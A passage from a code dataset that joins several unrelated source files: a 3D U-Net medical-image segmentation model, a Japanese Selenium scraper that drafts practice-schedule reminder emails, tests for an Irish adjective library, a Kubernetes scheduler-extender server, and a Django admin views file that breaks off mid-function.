python\n# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2019 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# SPDX-License-Identifier: EPL-2.0\n#\n\nimport numpy as np\nimport tensorflow as tf\nimport keras as K\n#from tensorflow import keras as K\n\nclass unet(object):\n\n def __init__(self, use_upsampling=False, learning_rate=0.001,\n n_cl_in=1, n_cl_out=1, feature_maps = 16,\n dropout=0.2, print_summary=False,\n channels_last = True):\n\n self.channels_last = channels_last\n if channels_last:\n self.concat_axis = -1\n 
self.data_format = \"channels_last\"\n\n else:\n self.concat_axis = 1\n self.data_format = \"channels_first\"\n\n #print(\"Data format = \" + self.data_format)\n K.backend.set_image_data_format(self.data_format)\n\n self.fms = feature_maps # 16 or 32 feature maps in the first convolutional layer\n\n self.use_upsampling = use_upsampling\n self.dropout = dropout\n self.print_summary = print_summary\n self.n_cl_in = n_cl_in\n self.n_cl_out = n_cl_out\n\n # self.loss = self.dice_coef_loss\n self.loss = self.combined_dice_ce_loss\n\n self.learning_rate = learning_rate\n self.optimizer = K.optimizers.Adam(lr=self.learning_rate)\n\n self.metrics= [self.dice_coef, self.soft_dice_coef, \"accuracy\",\n self.sensitivity, self.specificity]\n\n self.custom_objects = {\n \"combined_dice_ce_loss\": self.combined_dice_ce_loss,\n \"dice_coef_loss\": self.dice_coef_loss,\n \"dice_coef\": self.dice_coef,\n \"soft_dice_coef\": self.soft_dice_coef,\n \"sensitivity\": self.sensitivity,\n \"specificity\": self.specificity}\n\n self.model = self.unet_3d()\n\n def dice_coef(self, target, prediction, axis=(1, 2, 3), smooth=0.01):\n \"\"\"\n Sorenson Dice\n \\frac{ 2 \\times \\left | T \\right | \\cap \\left | P \\right |}{ \\left | T \\right | + \\left | P \\right | }\n where T is ground truth mask and P is the prediction mask\n \"\"\"\n prediction = tf.round(prediction) # Round to 0 or 1\n\n intersection = tf.reduce_sum(target * prediction, axis=axis)\n union = tf.reduce_sum(target + prediction, axis=axis)\n numerator = tf.constant(2.) * intersection + smooth\n denominator = union + smooth\n coef = numerator / denominator\n\n return tf.reduce_mean(coef)\n\n def soft_dice_coef(self, target, prediction, axis=(1, 2, 3), smooth=0.01):\n \"\"\"\n Sorenson (Soft) Dice - Don't round predictions\n \\frac{ 2 \\times \\left | T \\right | \\cap \\left | P \\right |}{ \\left | T \\right | + \\left | P \\right | }\n where T is ground truth mask and P is the prediction mask\n \"\"\"\n intersection = tf.reduce_sum(target * prediction, axis=axis)\n union = tf.reduce_sum(target + prediction, axis=axis)\n numerator = tf.constant(2.) 
* intersection + smooth\n denominator = union + smooth\n coef = numerator / denominator\n\n return tf.reduce_mean(coef)\n\n\n def dice_coef_loss(self, target, prediction, axis=(1, 2, 3), smooth=0.1):\n \"\"\"\n Sorenson (Soft) Dice loss\n Using -log(Dice) as the loss since it is better behaved.\n Also, the log allows avoidance of the division which\n can help prevent underflow when the numbers are very small.\n \"\"\"\n intersection = tf.reduce_sum(prediction * target, axis=axis)\n p = tf.reduce_sum(prediction, axis=axis)\n t = tf.reduce_sum(target, axis=axis)\n numerator = tf.reduce_mean(intersection + smooth)\n denominator = tf.reduce_mean(t + p + smooth)\n dice_loss = -tf.log(2.*numerator) + tf.log(denominator)\n\n return dice_loss\n\n\n def combined_dice_ce_loss(self, target, prediction, axis=(1, 2, 3),\n smooth=0.1, weight=0.7):\n \"\"\"\n Combined Dice and Binary Cross Entropy Loss\n \"\"\"\n return weight*self.dice_coef_loss(target, prediction, axis, smooth) + \\\n (1-weight)*K.losses.binary_crossentropy(target, prediction)\n\n\n def unet_3d(self):\n \"\"\"\n 3D U-Net\n \"\"\"\n def ConvolutionBlock(x, name, fms, params):\n \"\"\"\n Convolutional block of layers\n Per the original paper this is back to back 3D convs\n with batch norm and then ReLU.\n \"\"\"\n\n x = K.layers.Conv3D(filters=fms, **params, name=name+\"_conv0\")(x)\n x = K.layers.BatchNormalization(name=name+\"_bn0\")(x)\n x = K.layers.Activation(\"relu\", name=name+\"_relu0\")(x)\n\n x = K.layers.Conv3D(filters=fms, **params, name=name+\"_conv1\")(x)\n x = K.layers.BatchNormalization(name=name+\"_bn1\")(x)\n x = K.layers.Activation(\"relu\", name=name)(x)\n\n return x\n\n if self.channels_last:\n input_shape = [None, None, None, self.n_cl_in]\n else:\n input_shape = [self.n_cl_in, None, None, None]\n\n inputs = K.layers.Input(shape=input_shape,\n name=\"MRImages\")\n\n params = dict(kernel_size=(3, 3, 3), activation=None,\n padding=\"same\", data_format=self.data_format,\n kernel_initializer=\"he_uniform\")\n\n # Transposed convolution parameters\n params_trans = dict(data_format=self.data_format,\n kernel_size=(2, 2, 2), strides=(2, 2, 2),\n padding=\"same\")\n\n\n # BEGIN - Encoding path\n encodeA = ConvolutionBlock(inputs, \"encodeA\", self.fms, params)\n poolA = K.layers.MaxPooling3D(name=\"poolA\", pool_size=(2, 2, 2))(encodeA)\n\n encodeB = ConvolutionBlock(poolA, \"encodeB\", self.fms*2, params)\n poolB = K.layers.MaxPooling3D(name=\"poolB\", pool_size=(2, 2, 2))(encodeB)\n\n encodeC = ConvolutionBlock(poolB, \"encodeC\", self.fms*4, params)\n poolC = K.layers.MaxPooling3D(name=\"poolC\", pool_size=(2, 2, 2))(encodeC)\n\n encodeD = ConvolutionBlock(poolC, \"encodeD\", self.fms*8, params)\n poolD = K.layers.MaxPooling3D(name=\"poolD\", pool_size=(2, 2, 2))(encodeD)\n\n encodeE = ConvolutionBlock(poolD, \"encodeE\", self.fms*16, params)\n # END - Encoding path\n\n # BEGIN - Decoding path\n if self.use_upsampling:\n up = K.layers.UpSampling3D(name=\"upE\", size=(2, 2, 2),\n interpolation=\"bilinear\")(encodeE)\n else:\n up = K.layers.Conv3DTranspose(name=\"transconvE\", filters=self.fms*8,\n **params_trans)(encodeE)\n concatD = K.layers.concatenate(\n [up, encodeD], axis=self.concat_axis, name=\"concatD\")\n\n decodeC = ConvolutionBlock(concatD, \"decodeC\", self.fms*8, params)\n\n if self.use_upsampling:\n up = K.layers.UpSampling3D(name=\"upC\", size=(2, 2, 2),\n interpolation=\"bilinear\")(decodeC)\n else:\n up = K.layers.Conv3DTranspose(name=\"transconvC\", filters=self.fms*4,\n **params_trans)(decodeC)\n 
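The Dice functions in this model reduce to a simple ratio over binary masks; a tiny NumPy sketch, independent of TensorFlow, showing how the hard variant (rounding first) and the soft variant (keeping probabilities, hence differentiable) differ on illustrative toy arrays:

```python
import numpy as np

def dice(target, prediction, smooth=0.01):
    # Hard Dice: round predictions to {0,1}, then 2*|T.P| / (|T|+|P|)
    prediction = np.round(prediction)
    intersection = np.sum(target * prediction)
    union = np.sum(target) + np.sum(prediction)
    return (2.0 * intersection + smooth) / (union + smooth)

def soft_dice(target, prediction, smooth=0.01):
    # Soft Dice: same ratio on raw probabilities, so gradients flow
    intersection = np.sum(target * prediction)
    union = np.sum(target) + np.sum(prediction)
    return (2.0 * intersection + smooth) / (union + smooth)

target = np.array([1, 1, 0, 0], dtype=float)
pred   = np.array([0.9, 0.6, 0.4, 0.1])
print(dice(target, pred))       # pred rounds to [1,1,0,0] -> ~1.0
print(soft_dice(target, pred))  # (2*1.5+0.01)/(2+2+0.01)  -> ~0.75
```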
concatC = K.layers.concatenate(\n [up, encodeC], axis=self.concat_axis, name=\"concatC\")\n\n decodeB = ConvolutionBlock(concatC, \"decodeB\", self.fms*4, params)\n\n if self.use_upsampling:\n up = K.layers.UpSampling3D(name=\"upB\", size=(2, 2, 2),\n interpolation=\"bilinear\")(decodeB)\n else:\n up = K.layers.Conv3DTranspose(name=\"transconvB\", filters=self.fms*2,\n **params_trans)(decodeB)\n concatB = K.layers.concatenate(\n [up, encodeB], axis=self.concat_axis, name=\"concatB\")\n\n decodeA = ConvolutionBlock(concatB, \"decodeA\", self.fms*2, params)\n\n if self.use_upsampling:\n up = K.layers.UpSampling3D(name=\"upA\", size=(2, 2, 2),\n interpolation=\"bilinear\")(decodeA)\n else:\n up = K.layers.Conv3DTranspose(name=\"transconvA\", filters=self.fms,\n **params_trans)(decodeA)\n concatA = K.layers.concatenate(\n [up, encodeA], axis=self.concat_axis, name=\"concatA\")\n\n # END - Decoding path\n\n convOut = ConvolutionBlock(concatA, \"convOut\", self.fms, params)\n\n prediction = K.layers.Conv3D(name=\"PredictionMask\",\n filters=self.n_cl_out, kernel_size=(1, 1, 1),\n data_format=self.data_format,\n activation=\"sigmoid\")(convOut)\n\n model = K.models.Model(inputs=[inputs], outputs=[prediction])\n\n if self.print_summary:\n model.summary()\n\n return model\n\n\n def sensitivity(self, target, prediction, axis=(1, 2, 3), smooth=0.0001):\n \"\"\"\n Sensitivity\n \"\"\"\n prediction = tf.round(prediction)\n\n intersection = tf.reduce_sum(prediction * target, axis=axis)\n coef = (intersection + smooth) / (tf.reduce_sum(target,\n axis=axis) + smooth)\n return tf.reduce_mean(coef)\n\n\n def specificity(self, target, prediction, axis=(1, 2, 3), smooth=0.0001):\n \"\"\"\n Specificity\n \"\"\"\n prediction = tf.round(prediction)\n\n intersection = tf.reduce_sum(prediction * target, axis=axis)\n coef = (intersection + smooth) / (tf.reduce_sum(prediction,\n axis=axis) + smooth)\n return tf.reduce_mean(coef)\n","sub_path":"3D/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"473848537","text":"from selenium import webdriver\nimport datetime\nfrom bs4 import BeautifulSoup\nimport time\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('--headless')\ndriver = webdriver.Chrome(\"./chromedriver\") # 今は chrome_options= ではなく options=\n\ndriver.get('https://hikonii-group-schedule.herokuapp.com/login')\n\n# input ID and Pass\nprint('トップページをクローリング中')\nemail = driver.find_element_by_name(\"session[email]\")\nemail.send_keys(\"test@test.test\")\npassword = driver.find_element_by_name(\"session[password]\")\npassword.send_keys(\"test\")\n\n# click login button\nlogin_button = driver.find_element_by_name(\"commit\")\nlogin_button.click()\n\n\n# transition to top page\ndriver.get('https://hikonii-group-schedule.herokuapp.com/')\n\n# get page html source\nhtml = driver.page_source\nwith open('./test.html', 'w') as f:\n f.write(html)\n\ndriver.quit()\nprint('クローリング完了')\n\nprint('トップページのスクレイピング開始')\n\n\nwith open('test.html', 'r') as html:\n soup = BeautifulSoup(html, 'html.parser')\n events = soup.find_all('tr')\n result_list = []\n for event in events[1:]:\n result_list.append([event['id'], str(event.find('td'))[23:31]])\n print(\"トップページのスクレイピング結果は以下の通り\")\n print(result_list)\n result = result_list\n print(\"スクレイピング完了\")\n\nprint('各ページのスクレイピング開始')\n\n\ndef date_formatted(event_date_str):\n return datetime.datetime.strptime(event_date_str, \"%Y%m%d\").date()\n\n\ndef 
crawling_each_page2(id):\n options = webdriver.ChromeOptions()\n options.add_argument('--headless')\n driver = webdriver.Chrome(\"./chromedriver\")\n print('詳細ページへのアクセスを開始します')\n driver.get('https://hikonii-group-schedule.herokuapp.com/login')\n\n # input ID and Pass\n email = driver.find_element_by_name(\"session[email]\")\n email.send_keys(\"test@test.test\")\n password = driver.find_element_by_name(\"session[password]\")\n password.send_keys(\"test\")\n\n # click login button\n login_button = driver.find_element_by_name(\"commit\")\n login_button.click()\n\n time.sleep(1)\n\n driver.get('https://hikonii-group-schedule.herokuapp.com/schedules/' + id)\n html = driver.page_source\n\n driver.quit()\n print(\"クローリング完了\")\n return html\n\n\ndef each_information2(html):\n soup = BeautifulSoup(html, 'html.parser')\n attr_list = [\"event\", \"location\", \"date\", \"detail\"]\n result_list = []\n for i in attr_list:\n content = soup.find(class_=i).text\n result_list.append([i, content])\n print(\"このイベントの詳細は以下の通り\")\n print(result_list)\n return result_list\n\n\ndef shaping_content2(result_list):\n mail_content = result_list[0][1]\n mail_content += \"\\n\"\n mail_content += result_list[2][1]\n mail_content += \"\\n\"\n mail_content += result_list[1][1]\n mail_content += \"\\n\"\n mail_content += result_list[3][1]\n mail_content += \"\\n\\n\"\n print(mail_content)\n print('を送信します')\n return mail_content\n\n\n# 日付による判定の準備\ntoday = datetime.datetime.today()\ntomorrow = (today + datetime.timedelta(days=1)).date()\nfour_days_later = (today + datetime.timedelta(days=4)).date()\ntoday_weekday = today.weekday()\n\n# 日付により判定→メール作成\nif today_weekday == 2: # もし今日が水曜日なら\n # 今週末の予定\n subject = '今週末の練習予定(自動配信)'\n mail_content = \"今週末の練習予定です。\\n\\n\"\n for i in result:\n if four_days_later >= date_formatted(i[1]): # その予定が4日後以内にあるなら\n html1 = crawling_each_page2(i[0])\n information = each_information2(html1)\n mail_content += shaping_content2(information)\n if mail_content != \"今週末の練習予定です。\\n\\n\": # もし今週末の予定が何かしらあるならメールを送信する。\n mail_content += \"\\n出欠の回答はこちらから→https://hikonii-group-schedule.herokuapp.com\"\n print('この内容でメールを送ることができます')\n print(mail_content)\n\nfor j in result:\n if tomorrow == date_formatted(j[1]):\n # 明日の予定\n subject1 = '明日の練習予定(自動配信)'\n mail_content = '明日の練習予定です。\\n\\n'\n html2 = crawling_each_page2(j[0])\n information = each_information2(html2)\n mail_content += shaping_content2(information)\n mail_content += \"\\n出欠の回答はこちらから→https://hikonii-group-schedule.herokuapp.com\"\n print('この内容でメールを送ることができます')\n print(mail_content)","sub_path":"hello/utils/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"647898150","text":"# coding=UTF-8\nfrom pygramadan.adjective import Adjective, example_xml\nfrom pygramadan.forms import Form\nfrom lxml.doctestcompare import LXMLOutputChecker, PARSE_XML\nimport io\n\n\nBEAG_XML = example_xml()\n\n\ndef test_create():\n sg_nom = [Form(\"beag\")]\n sg_gen_masc = [Form(\"big\")]\n sg_gen_fem = [Form(\"bige\")]\n pl_nom = [Form(\"beaga\")]\n graded = [Form(\"lú\")]\n abstract = [Form(\"laghad\")]\n beag = Adjective(disambig=\"\",\n declension=1,\n sg_nom=sg_nom,\n sg_gen_masc=sg_gen_masc,\n sg_gen_fem=sg_gen_fem,\n pl_nom=pl_nom,\n graded=graded,\n abstract=abstract)\n assert beag is not None\n\n\ndef make_beag():\n sg_nom = [Form(\"beag\")]\n sg_gen_masc = [Form(\"big\")]\n sg_gen_fem = [Form(\"bige\")]\n pl_nom = [Form(\"beaga\")]\n graded = 
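The schedule-mailer record above gates its weekend digest on "today is Wednesday" (`weekday() == 2`) plus a four-day look-ahead window, which is easy to misread inside the crawling code. A standalone sketch of just that window test, with hypothetical event dates:

```python
import datetime

def in_weekend_window(event_date, today=None):
    # Wednesday is weekday() == 2; events up to 4 days out (Wed-Sun) qualify.
    today = today or datetime.datetime.today()
    four_days_later = (today + datetime.timedelta(days=4)).date()
    return today.weekday() == 2 and event_date <= four_days_later

wednesday = datetime.datetime(2021, 6, 2)  # 2021-06-02 was a Wednesday
print(in_weekend_window(datetime.date(2021, 6, 5), wednesday))  # True: Saturday
print(in_weekend_window(datetime.date(2021, 6, 8), wednesday))  # False: next Tuesday
```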
[Form(\"lú\")]\n abstract = [Form(\"laghad\")]\n beag = Adjective(disambig=\"\",\n declension=1,\n sg_nom=sg_nom,\n sg_gen_masc=sg_gen_masc,\n sg_gen_fem=sg_gen_fem,\n pl_nom=pl_nom,\n graded=graded,\n abstract=abstract)\n return beag\n\n\ndef test_get_lemma():\n beag = make_beag()\n assert beag.get_lemma() == 'beag'\n\n\ndef test_read_xml():\n sio = io.StringIO(BEAG_XML)\n beag = Adjective(source=sio)\n assert beag.get_lemma() == 'beag'\n\n\ndef test_to_xml():\n beag = make_beag()\n xml = beag.to_xml()\n checker = LXMLOutputChecker()\n assert checker.check_output(BEAG_XML, xml, PARSE_XML) is True\n\n\ndef test_get_indentifier():\n beag = make_beag()\n assert beag.get_identifier() == 'beag_adj1'\n\n\ndef test_get_compar_pres():\n beag = make_beag()\n assert beag.get_compar_pres()[0].value == 'níos lú'\n\n\ndef test_get_super_pres():\n beag = make_beag()\n assert beag.get_super_pres()[0].value == 'is lú'\n\n\ndef test_get_compar_past():\n beag = make_beag()\n assert beag.get_compar_past()[0].value == 'ní ba lú'\n dummy1 = Adjective(graded=[Form(\"adha\")])\n assert dummy1.get_compar_past()[0].value == \"ní b'adha\"\n dummy2 = Adjective(graded=[Form(\"fusa\")])\n assert dummy2.get_compar_past()[0].value == \"ní b'fhusa\"\n\n\ndef test_get_super_past():\n beag = make_beag()\n assert beag.get_super_past()[0].value == 'ba lú'\n dummy1 = Adjective(graded=[Form(\"adha\")])\n assert dummy1.get_super_past()[0].value == \"ab adha\"\n dummy2 = Adjective(graded=[Form(\"fusa\")])\n assert dummy2.get_super_past()[0].value == \"ab fhusa\"\n\n\ndef test_get_all_forms():\n beag = make_beag()\n beag_list = beag.get_all_forms(abstract=False)\n assert len(beag_list) == 5\n exp1 = [('sg_nom', 'beag'), ('sg_gen_masc', 'big'), ('sg_gen_fem', 'bige'), ('pl_nom', 'beaga'), ('graded', 'lú')]\n beag_list.sort()\n exp1.sort()\n assert beag_list == exp1\n beag_list2 = beag.get_all_forms()\n assert len(beag_list2) == 6\n exp2 = exp1 + [('abstract', 'laghad')]\n beag_list2.sort()\n exp2.sort()\n assert beag_list2 == exp2\n","sub_path":"tests/test_adjective.py","file_name":"test_adjective.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"413027748","text":"# Copyright (c) 2020 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport logging\nimport time\nimport threading\nfrom typing import Dict\n\nfrom dataclasses import asdict\nfrom flask import Flask, request, jsonify\n\nfrom wca.config import Numeric\nfrom wca.metrics import Metric, MetricType\nfrom wca.scheduler.algorithms import Algorithm, RescheduleResult\nfrom wca.scheduler.kubeapi import Kubeapi\nfrom wca.scheduler.metrics import MetricName\nfrom wca.scheduler.types import ExtenderArgs, ExtenderFilterResult\n\nlog = logging.getLogger(__name__)\n\nDEFAULT_NAMESPACE = 'default'\nDEFAULT_METRIC_LABELS = {}\nKUBEAPI_DELETE_POD_QUERY = '/api/v1/namespaces/%s/pods/%s'\n\n\nclass Server:\n\n def reschedule_once(self):\n # Decide which tasks should be 
rescheduled.\n reschedule_result: RescheduleResult = self.algorithm.reschedule()\n\n if len(reschedule_result) > 0:\n log.info('[Rescheduling] %r', reschedule_result)\n\n # Delete them.\n for task in reschedule_result:\n self.kubeapi.delete(KUBEAPI_DELETE_POD_QUERY % (DEFAULT_NAMESPACE, task))\n\n return jsonify(True)\n\n def reschedule_interval(self, interval: Numeric(0, 60)):\n while True:\n self.reschedule()\n time.sleep(interval)\n\n def __init__(self, configuration: Dict[str, str]):\n self.app = Flask('k8s scheduler extender')\n self.algorithm: Algorithm = configuration['algorithm']\n self.kubeapi: Kubeapi = configuration['kubeapi']\n\n reschedule_interval = configuration.get('reschedule_interval')\n\n if reschedule_interval:\n reschedule_thread = threading.Thread(\n target=self.reschedule_interval,\n args=[reschedule_interval])\n reschedule_thread.start()\n\n @self.app.route('/reschedule')\n def reschedule():\n return self.reschedule_once()\n\n @self.app.route('/status')\n def status():\n return jsonify(True)\n\n @self.app.route('/metrics')\n def metrics():\n metrics_registry = self.algorithm.get_metrics_registry()\n if metrics_registry:\n return metrics_registry.prometheus_exposition()\n else:\n return ''\n\n @self.app.route('/filter', methods=['POST'])\n def filter():\n extender_args = ExtenderArgs(**request.get_json())\n pod_namespace = extender_args.Pod['metadata']['namespace']\n pod_name = extender_args.Pod['metadata']['name']\n\n log.debug('[Filter] %r ' % extender_args)\n metrics_registry = self.algorithm.get_metrics_registry()\n\n if DEFAULT_NAMESPACE == pod_namespace:\n log.info('[Filter] Trying to filter nodes for Pod %r' % pod_name)\n\n result = self.algorithm.filter(extender_args)\n\n log.info('[Filter] Result: %r' % result)\n\n if metrics_registry:\n metrics_registry.add(Metric(\n name=MetricName.FILTER,\n value=1,\n labels=DEFAULT_METRIC_LABELS,\n type=MetricType.COUNTER))\n\n return jsonify(asdict(result))\n else:\n log.info('[Filter] Ignoring Pod %r : Different namespace!' %\n pod_name)\n\n if metrics_registry:\n metrics_registry.add(Metric(\n name=MetricName.POD_IGNORE_FILTER,\n value=1,\n labels=DEFAULT_METRIC_LABELS,\n type=MetricType.COUNTER))\n\n return jsonify(ExtenderFilterResult(NodeNames=extender_args.NodeNames))\n\n @self.app.route('/prioritize', methods=['POST'])\n def prioritize():\n extender_args = ExtenderArgs(**request.get_json())\n pod_namespace = extender_args.Pod['metadata']['namespace']\n pod_name = extender_args.Pod['metadata']['name']\n\n metrics_registry = self.algorithm.get_metrics_registry()\n log.debug('[Prioritize-server] %r ' % extender_args)\n\n if DEFAULT_NAMESPACE == pod_namespace:\n log.info('[Prioritize-server] Trying to prioritize nodes for Pod %r' % pod_name)\n\n result = self.algorithm.prioritize(extender_args)\n\n priorities = [asdict(host)\n for host in result]\n\n log.info('[Prioritize-server] Result: %r ' % priorities)\n\n if metrics_registry:\n metrics_registry.add(Metric(\n name=MetricName.PRIORITIZE,\n value=1,\n labels=DEFAULT_METRIC_LABELS,\n type=MetricType.COUNTER))\n\n return jsonify(priorities)\n else:\n log.info('[Prioritize-server] Ignoring Pod %r : Different namespace!' 
%\n pod_name)\n\n if metrics_registry:\n metrics_registry.add(Metric(\n name=MetricName.POD_IGNORE_PRIORITIZE,\n value=1,\n labels=DEFAULT_METRIC_LABELS,\n type=MetricType.COUNTER))\n\n return jsonify([])\n","sub_path":"wca/scheduler/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"59220695","text":"# encoding: utf-8\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponseRedirect, HttpResponse\n#from django.utils import simplejson\nfrom pools.functions import web_login_required\n# encoding: utf-8\n'''\n\n'''\n\n#using Jinja2\n#from jinja2 import Environment\n#from jinja_helper import render_to_response\n\n#load db\nfrom pools.models import *\n\n#load forms \nfrom pools.model_forms import *\n\n#others\nfrom types import *\n\nimport sys\nimport os\nimport datetime\n\ndef droptables(tblname):\n\t'''delete the table contents\n\t'''\n\tfrom db import models\n\ttbl = getattr(models,tblname)\n\tstR = tbl.objects.all()\n\tfor m in stR:\n\t\tm.delete()\n\ndef tbl_write(flname,tblname):\n\t#import the tables...\n\tfrom db import models\n\timport datetime\n\t\n\tpath = os.path.join(os.path.split(__file__)[0],flname)\n\tfl = open(path,'rb')\n\tidx = 0\n\tfor line in fl.readlines():\n\t\tline = line.replace('\"', '').strip()\n\t\tif idx == 0:\n\t\t\tfields = line.split(\",\")\n\t\telse:\n\t\t\titem = line.split(\",\")\n\t\t\ttbl = getattr(models,tblname)\n\t\t\ttmp_inst = tbl()\n\t\t\tndx = 0\n\t\t\tfor field in fields:\n\t\t\t\tfdtype = tmp_inst._meta.get_field(field).get_internal_type() \n\t\t\t\tif item[ndx]:\n\t\t\t\t\t\tif fdtype == 'AutoField' or fdtype == 'BooleanField' or fdtype =='IntegerField':\n\t\t\t\t\t\t\tins_value = int(item[ndx])\n\t\t\t\t\t\telif fdtype == 'CharField':\n\t\t\t\t\t\t\tins_value = item[ndx]\n\t\t\t\t\t\telif fdtype == 'TextField':\n\t\t\t\t\t\t\tins_value = item[ndx]\n\t\t\t\t\t\telif fdtype == 'DateField':\n\t\t\t\t\t\t\tins_value = item[ndx]\n\t\t\t\t\t\telif fdtype == 'DateTimeField':\n\t\t\t\t\t\t\tdateObj =datetime.datetime.strptime(item[ndx],'%m-%d-%Y; %H:%M')\n\t\t\t\t\t\t\tdateS = datetime.datetime.strftime(dateObj,'%Y-%m-%d %H:%M')\n\t\t\t\t\t\t\tins_value = dateS\n\t\t\t\t\t\telif fdtype == 'ForeignKey':\n\t\t\t\t\t\t\tif field == 'place_no':\n\t\t\t\t\t\t\t\tfkobj = getattr(models, 'place')\n\t\t\t\t\t\t\t\tfkinst = fkobj.objects.get(place_no = int(item[ndx]))\n\t\t\t\t\t\t\telif field == 'u_id':\n\t\t\t\t\t\t\t\tfkobj = getattr(models, 'who')\n\t\t\t\t\t\t\t\tfkinst = fkobj.objects.get(u_id = int(item[ndx]))\n\t\t\t\t\t\t\tins_value = fkinst\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tndx = ndx + 1\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tsetattr(tmp_inst, field, ins_value )\n\t\t\t\tndx = ndx + 1\n\t\t\ttmp_inst.save()\n\t\tidx = idx + 1\n\tfl.close()\n\t\ndef tbl_inserts(request):\n\t'''\n\tthis function: 用來將所有資料回寫到資料表中\n\t'''\n\t#try to write \n\t#droptables('place')\n\t#tbl_write('place.csv','place')\n\t#droptables('who')\n\t#tbl_write('who.csv','who')\n\t#droptables('reserve')\n\t\n\t#tbl_write('reserve.csv','reserve')\n\t#tbl_write('messages.csv','messages')\n\ttbl_write('User.csv','members')\n\tmsg = u'資料寫入完成...'\n\treturn render_to_response('OK.html',{'msg':msg})\n\ndef index(request):\n\t'''\n\tmain screen for admin\n\t'''\n\ttry:\n\t\tif request.session['usrid']:\n\t\t\tpass\n\t\telse:\n\t\t\treturn HttpResponseRedirect('/place_manage/')\n\texcept:\n\t\treturn 
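The scheduler-extender record above is normally driven by POSTs from the Kubernetes scheduler itself, but its `/filter` endpoint can be exercised by hand. A rough sketch, assuming the Flask app listens locally on port 5000; the payload fields follow the `ExtenderArgs` usage visible in the record (`Pod.metadata.namespace`, `Pod.metadata.name`, `NodeNames`), and everything else is a placeholder:

```python
import requests

# Minimal ExtenderArgs-shaped payload: the handler reads the pod's
# namespace/name and echoes NodeNames back when it ignores the pod.
payload = {
    "Pod": {"metadata": {"namespace": "default", "name": "demo-pod"}},
    "Nodes": None,
    "NodeNames": ["node101", "node102"],
}

resp = requests.post("http://127.0.0.1:5000/filter", json=payload)
print(resp.status_code, resp.json())
```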
HttpResponseRedirect('/place_manage/')\n\t\n\ttry:\n\t\tusrRight = request.session['usrRight']\n\texcept:\n\t\tusrRight = 0\n\tif usrRight != 99:\n\t\tmsg = u'無管理者權限...'\n\t\treturn render_to_response('OK.html',{'msg':msg})\n\t\n\tmsg = u'管理者功能主頁'\n\t\n\treturn render_to_response('/member/index.htm',{'msg':msg})\n\ndef message(request):\n\t'''\n\t發佈消息\n\t'''\n\tmsg = u'發佈消息'\n\tcForm = messagesAdminForm()\n\tif request.method == 'POST':\n\t\t#valid the value\n\t\tcForm = messagesAdminForm(request.POST)\n\t\tif cForm.is_valid():\n\t\t\tcForm.save()\n\t\t\tmsg = u'消息發佈成功...'\n\t\t\treturn render_to_response('OK.html',{'msg':msg})\n\treturn render_to_response('/member/message.html',{'msg':msg,'form':cForm})\n\ndef place_add(request):\n\t'''\n\t新增場地\n\t'''\n\tmsg = u'新增場地及使用規則'\n\tif request.method == 'POST':\n\t\tif request.POST['submit']:\n\t\t\tplaceobj = place()\n\t\t\tplaceobj.name =request.POST['Name']\n\t\t\tplaceobj.location = request.POST['location']\n\t\t\tplaceobj.regulation=request.POST['regulation']\n\t\t\tpgroups=''\n\t\t\ttry:\n\t\t\t\tif request.POST['place_m_groups']:\n\t\t\t\t\tpgroups = request.POST['place_m_groups']\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\tif request.POST['place_groups'] != 'none':\n\t\t\t\tpgroups = request.POST['place_groups']\n\t\t\tplaceobj.place_groups = pgroups\n\t\t\tplaceobj.save()\n\t\t\tmsg = u'場地資訊新增成功...'\n\t\t\treturn render_to_response('OK.html',{'msg':msg})\n\tcForm = placeAdminForm()\n\t#要找出群組場地...\n\t#因為不支援distinct(),只好自行做一個distinct功能...\n\t#原理是利用 dict 的key 必須是unique, 因此會自動濾除重複值\n\tplaces = place.objects.all().values(\"place_groups\").order_by(\"place_groups\")\n\tpvalues = []\n\tfor item in places:\n\t\tpvalues.append(item['place_groups'])\n\tuniqlist = dict.fromkeys(pvalues).keys() \n\treturn render_to_response('/member/place_add.html',{'msg':msg,'form':cForm,'pgroup':uniqlist})\n\nfrom pools.util import *\n\ndef user_mgm(request):\n\t'''\n\t使用者管理\n\t'''\n\tmsg = u'使用者管理'\n\tnext = request.path\n\t\n\t#加入頁次計算,每頁15筆,每個畫面10頁\n\tnext = request.path\n\tcurrpage = 1\n\ttry:\n\t\tif request.GET['page']:\n\t\t\tcurrpage = int(request.GET.get('page', '1'))\n\texcept:\n\t\tcurrpage = 1\n\ttry:\n\t\tif request.GET['preScr']:\n\t\t\tcurScr = int(request.GET.get('preScr','0'))\n\t\t\tcurrpage = int(curScr)*10+1\n\texcept:\n\t\tcurScr = 0\n\ttry:\n\t\tif request.GET['nextScr']:\n\t\t\tnextScr = int(request.GET.get('nextScr','1'))\n\t\t\tcurrpage = int(nextScr)*10+1\n\texcept:\n\t\tnextScr = 1\n\twhoObj = who.objects.all().order_by('-u_id')\n\tperScr = 10\n\tperPage = 